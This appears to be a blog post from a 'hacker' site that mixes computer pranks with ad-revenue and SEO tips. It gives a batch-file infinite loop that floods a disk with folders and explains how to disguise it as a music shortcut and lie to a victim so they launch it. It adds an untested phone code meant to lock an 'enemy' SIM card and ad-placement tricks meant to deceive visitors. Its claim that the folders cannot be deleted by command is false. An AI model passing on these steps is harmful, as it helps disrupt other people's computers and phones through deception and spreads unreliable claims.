    2. Make over 1,000 folders in few seconds


    Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.

    1. Open notepad and type :

    @echo off
    :top
    md %random%
    goto top 


    @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
    md %random% is command that creating folders with random names.
    goto top – return to label :top, infinite loop





    2. Save it as 1000folders.bat


    3. After that you will get icon that looks as show below


    People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

    4. Right click on icon and click Create Shortcut


    5. Right click on shortcut and click properties , then click on Change Icon and rename icon


    Tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…


    3. Microsoft Word Prank 

    Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.

    1. Launch Microsoft Word

    2. Go to Tools -> AutoCorrect Options…


    3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add



    5. Cool Windows Prank 

    This will make it to where your friend cannot click on anything on the screen.

    1. Take a screenshot of the desktop. You can use windows printscreen or some printscreen software.


    2. Make your printscreen picture as desktop background.

    3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
    Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)


    That is it , when you click on the “icons”, nothing will happen!

    please share if you like our tutorials : Crash a Computer System

    HOW TO BLOCK YOUR SIM CARD (i didnt try it)



    Here I am going to share a simple trick for block your enemy sim card,Blocking a sim card is too simple.What you have to do is just enter the below code in the desired phone
    **04*3814*7529*68243#
    Entering of above code will ask you to enter the PUK code.To solve this issue just call customer care and get your PUK code.
    Note:Entering of invalid PUK will cause permanent blocking of your SIM

    How to Maximize Ad Revenue on a Website

    Have a website ? Confused on how to make dough through it ? Read on … How to Maximize Ad Revenue on a Website
    Contextual advertisers include Yahoo Publisher Network, Google, and Adbrite. These ads usually display a link followed by some description text or the url of the link.Placement,theme and various factors contribute to the overall earning potential of a website.Here are some guidelines to follow whilst you just post through it.
    • Make sure you place the ad correctly. Ads that people can’t see won’t be clicked on, so make sure the ads are located in a prime spot that will generate interest. The best spots for an ad is on the top fold of the webpage, meaning the viewer can see the ad without having to scroll. But not on the very top, most people don't look there
    • Consider linking text. This helps to make the ad stand out more and gives a better chance for the viewer to actually read the ads. Secondly, since the ads are embedded within the text, it’s harder for the viewer to miss. Ads located on the sides are oftentimes looked over, which is exactly what you don't want visitors to do.
    • Put small, relevant images next to your ads. This has been show to increase ad revenue because this attracts attention to the ads, and people are tricked into thinking that the picture is content related to the ad. Google Adsense allows this method (somewhat, however, some images placed next to ads can violate Google TOS, ask Google before adding images next to ads), however Yahoo Publisher Network does not allow it. Read the TOS on certain publishers to get more info on whether this is allowed or not.
    • Make the ads relevant. The best part of contextual advertising is that the ads are relevant to your site (Adbrite does not have this feature, they just put up generic network ads). Google and Yahoo both target their ads decently well, but Google Adsense definitely has the best ads that are relevant to your site. To increase ad relativity, make sure the keywords that you want ads for are repeated throughout. For example, if you wanted to display ads related to “making money” you would repeat the phrase making money many times on my page. If you want to be making money, and making money is what you want, then make sure that you are making money by implementing these ads well. It’s also best to spread your keywords throughout the page instead of concentrated in one area like above.
    • Keep to one theme. This kind of ties in with making your ads relevent, but make sure your website concentrates one one certain type of category. For example, GameSpot.com is a site that focuses on games, while IGN.com has sections over games, movies, comics, cars, etc. GameSpot, if they used Google Adsense, would be serving the most relevent ads - gaming ads. While IGN, if they used Google Adsense, would be serving ads about all sorts of things because they have so many sectors. If a gamer goes on IGN and sees an ad about Japanese Movies, they probably won’t be enticed to click. Of course, these statements are just theoretically speaking, the main point is that if your website is focused on one topic, the ads will be better served to your target audience. If you have a website that covers many things, it will be harder to generate ads that interest your users.
    • Do your research. Each publisher allows you to create separate channels for your ads so you can track how each individual ad unit is doing. Look over your ads and see which ones are performing the best, and then make a judgment as to which ads you should keep and which ones you should alter or get rid of. Constantly looking over your statistics is a key factor to increasing your ad revenue.

    Improve Google Page Rank and Alexa Ranking

    Showing up on search engines is one of the most critical ways to increase website traffic and expose your content, improve search engine rankings product or service to people who might be interested in what you have to offer. Most of the major search engines utilize an algorithm to determine where a website ranks.Google uses Pagerank system and Alexa uses various criteria’s to rank your position in related searches.A proven but little-known way to improve your page rank with Google and your Alexa ranking for new web authors is here for you.
    Steps
    1. Build a website. NVU is an easy free WYSIWYG html editor or use a simple blogging platform like blogger,typepad or wordpress.
    2. Make sure that your site is optimized for the search engines and that all meta tags and robot tags are constructed properly.
    3. Focus building your site on original and unique content. Once Internet users start to appreciate and see the value in your website, they will begin linking to it.
    4. Submit your site map to Google to have all of your pages indexed.
    5. Submit to the main search engines, Yahoo, Google, MSN and any others that you prefer.
    6. Go to your favorite search engines and type in "social bookmark sites".
    7. Submit your site and any other favorite sites to as many social bookmark sites that you like.
    8. Submit your site to as many directories as you can, specially to those with high page rank like DMOZ or yahoo directory or to any smaller directory with lower page rank.
    9. Update your site frequently adding new content that keeps users returning to your site.
    This method is two-pronged because not only will you get better positions in searches for your keywords, you are also going to receive one way inbound links for your website which will improve your search engine rankings.Add your website address sparingly to social bookmarking and wiki sites. Users who over-indulge in self-promotion will be perceived as spammers which may result in your website being added to blacklists or, even worse, your efforts to be simply ignored.Beware of duplicate content. Always make sure to check the content that you get by searching for the content on Google, Yahoo, and MSN.Be original and blog original. And just in case if you are copying from other blogs or websites,then do give a reference or link to the original source.

    Increase Alexa Rank

    If you have attempted to sell advertising on your website, you have probably heard of Alexa. Alexa is a company thatIncrease Alexa Rank - rdhacker.blogspot.com ranks websites based on traffic. They get their information primarily from the Alexa Toolbar, a free, downloadable browser add-on.
    Advertisers often consider Alexa rank when deciding whether to advertise on a website, so it's important to your visitors are counted,so that you make more bucks off…
    Tempted ? Keep reading..
    Here’s how to Do that
    Install the Alexa widget on your website - It shows your Alexa rank to anyone who visits and ensures that each visit to your site is counted.
    Encourage your site’s visitors to install the Alexa Toolbar - This will ensure that every day that they visit your website, Alexa will count it and incorporate the information into your Alexa rank.Increase Alexa Rank - rdhacker.blogspot.com

    Home Page Matters - Ask your visitors to make your site their browser’s home page. You could even include instructions on how to do this with different browsers. Bring them back with incentives. Regularly updated and informative content is a great incentive for visitors to keep coming back for more.
    Alexa Autosurfs - Try Alexa autosurf programs or link trains. These often bring substantial improvement in the short term, but not so much in the long term. They are best for new websites.
    Keep in Mind
    • You want your Alexa rank numbers to go down, not up. An Alexa rank of 100,000 or lower is the most attractive to advertisers, but many are interested in advertising on sites with higher numbers as well.
    • Link trains are frowned upon by some search engines. It’s up to you to decide whether increasing your Alexa rank is worth the risk.
    • If you are also interested in increasing your Google PageRank, you’ll need regular links coming in as well,hence get backlinks by commenting in other people’s blog or by link exchange.
    Related Posts with Thumbnails